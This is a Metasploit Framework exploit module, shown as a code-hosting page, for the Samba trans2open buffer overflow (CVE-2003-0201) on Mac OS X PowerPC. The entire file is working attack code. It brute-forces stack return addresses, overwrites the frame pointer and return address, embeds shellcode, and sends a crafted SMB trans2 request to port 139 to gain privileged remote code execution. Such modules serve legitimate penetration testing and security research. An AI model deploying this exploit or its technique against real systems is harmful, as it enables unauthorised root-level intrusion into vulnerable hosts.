Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/samba/trans2open.rb
19720 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Exploit::Brute

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Samba trans2open Overflow (Mac OS X PPC)',

17
        'Description' => %q{

18
          This exploits the buffer overflow found in Samba versions

19
          2.2.0 to 2.2.8. This particular module is capable of

20
          exploiting the bug on Mac OS X PowerPC systems.

21
        },

22
        'Author' => [ 'hdm', 'jduck' ],

23
        'References' => [

24
          [ 'CVE', '2003-0201' ],

25
          [ 'OSVDB', '4469' ],

26
          [ 'BID', '7294' ],

27
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]

28
        ],

29
        'Privileged' => true,

30
        'Payload' => {

31
          'Space' => 1024,

32
          'BadChars' => "\x00",

33
          'MinNops' => 512,

34
        },

35
        'Platform' => 'osx',

36
        'Arch' => ARCH_PPC,

37
        'Notes' => {

38
          'AKA' => ['ECHOWRECKER'],

39
          'Stability' => UNKNOWN_STABILITY,

40
          'Reliability' => UNKNOWN_RELIABILITY,

41
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

42
        },

43
        'Targets' => [

44
          [

45
            'Samba 2.2.x - Bruteforce',

46
            {

47
              # Not necessary on PPC

48
              # 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack

49
              'Offset' => 1195,

50
              'Bruteforce' =>

51
                {

52
                  'Start' => { 'Ret' => 0xbffffdfc },

53
                  'Stop' => { 'Ret' => 0xbfa00000 },

54
                  'Step' => 512

55
                }

56
            }

57
          ]

58
        ],

59
        'DisclosureDate' => '2003-04-07',

60
        'DefaultTarget' => 0

61
      )

62
    )

63


64
    register_options(

65
      [

66
        Opt::RPORT(139)

67
      ]

68
    )

69


70
    deregister_options('SMB::ProtocolVersion')

71
  end

72


73
  # Need to perform target detection

74
  def autofilter

75
    false

76
  end

77


78
  def brute_exploit(addrs)

79
    curr_ret = addrs['Ret']

80
    begin

81
      print_status("Trying return address 0x%.8x..." % curr_ret)

82


83
      connect(versions: [1])

84
      smb_login

85


86
      # 1988 is required for findrecv shellcode

87
      pattern = rand_text_english(1988)

88


89
      # This stream covers the framepointer and the return address

90
      off = target['Offset']

91
      pattern[off, 64] = [curr_ret].pack('N') * 16

92


93
      # Stuff the shellcode into the request

94
      pattern[3, payload.encoded.length] = payload.encoded

95


96
      trans =

97
        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00" +

98
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" +

99
        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00" +

100
        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01" +

101
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

102
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90" +

103
        pattern

104


105
      sock.put(trans)

106
      handler

107
      disconnect

108
    rescue EOFError

109
    rescue => e

110
      print_error(e.to_s)

111
    end

112
  end

113
end

114


115